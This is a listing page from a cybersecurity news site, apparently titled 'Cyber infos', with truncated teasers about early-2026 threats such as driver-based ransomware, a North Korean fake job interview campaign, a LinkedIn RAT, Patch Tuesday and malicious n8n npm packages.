A widespread kernel driver ransomware attack is actively being used by threat actors to shut down security defenses before ransomware is deployed. What makes this campaign especially dangerous isn’t flashy malware or zero-day exploits it’s the quiet misuse of trust. Attackers are loading legitimate drivers to pull the plug on security tools, clearing the path for encryption and long-term compromise. In the first stages of this kernel driver ransomware attack, victims often see nothing unusual, even as protection is systematically dismantled behind the scenes. Incident Overview and Timeline Here’s the thing: this activity didn’t appear overnight. Researchers first noticed attackers…
Author: Cyber infos
The North Korea VS Code malware attack is drawing urgent attention from security teams this week after researchers confirmed that developers are being targeted through fake job interview assignments. According to published reports, North Korean state-linked actors are distributing malicious repositories that abuse everyday developer workflows. The activity matters now because affected developers often work in cryptocurrency and fintech, where a single compromised machine can expose sensitive code, credentials, and digital assets Key Facts Box Date disclosed: December 2025 – January 2026 Threat actors: DPRK-linked Contagious Interview campaign Primary targets: Software developers Attack classification: developer supply chain attack Initial access…
The LinkedIn RAT malware campaign uncovered in January 2026 is a clear sign that phishing has outgrown email. Cybersecurity researchers revealed that attackers are now using LinkedIn private messages to distribute malware through DLL sideloading, quietly targeting professionals who rely on the platform for daily business communication. Here’s the thing LinkedIn feels safe. Familiar. Routine. That assumption is exactly what makes this campaign effective. By exploiting trust rather than software flaws, attackers have found a low-friction path into corporate environments, one that many organizations still fail to monitor. This article breaks down what’s happening, how the attack works, and what…
This cybersecurity weekly report for 11–17 January 2026 documents a week defined by scale, speed, and systemic exposure. Across industries, attackers demonstrated that exploiting trust relationships—APIs, third-party vendors, and automation platforms—remains more effective than breaching hardened perimeters. High-impact data exposures in social media, healthcare, and e-commerce created immediate downstream risks, particularly phishing, identity fraud, and account takeover attempts. At the same time, defendersansomware operators accelerated activity despite declining ransom payments, signaling a shift toward volume-driven campaigns, double- and triple-extortion models, and monetization through data resale rather than encryption alone. The disclosure of a critical unauthenticated remote code execution vulnerability in…
Microsoft Patch Tuesday January 2026 is a big one. This month’s update fixes 112 security vulnerabilities across Windows, Microsoft Office, SharePoint, and several core Windows components. More importantly, it includes three zero-day vulnerabilities, along with multiple critical remote code execution (RCE) and privilege escalation flaws. For organizations and IT teams, this is not a “patch later” update. Several of the issues affect authentication services, file sharing, update infrastructure, and Office documents areas attackers actively target. What Changed in January 2026? Here’s a quick snapshot of what Microsoft fixed: 112 total vulnerabilities 3 zero-days 12 critical vulnerabilities The majority are Elevation…
A newly disclosed n8n supply chain attack has revealed how threat actors abused community-maintained npm packages to steal sensitive OAuth credentials from developers and organizations, according to a report published this week by Endor Labs. The attackers uploaded malicious packages to the npm registry that posed as legitimate n8n community nodes, including a fake Google Ads integration. Once installed, these packages captured OAuth tokens during normal workflow execution and transmitted them to attacker-controlled servers, researchers confirmed. The incident highlights growing security risks associated with third-party integrations in workflow automation platforms increasingly used for business-critical operations. How the Attack Was Discovered…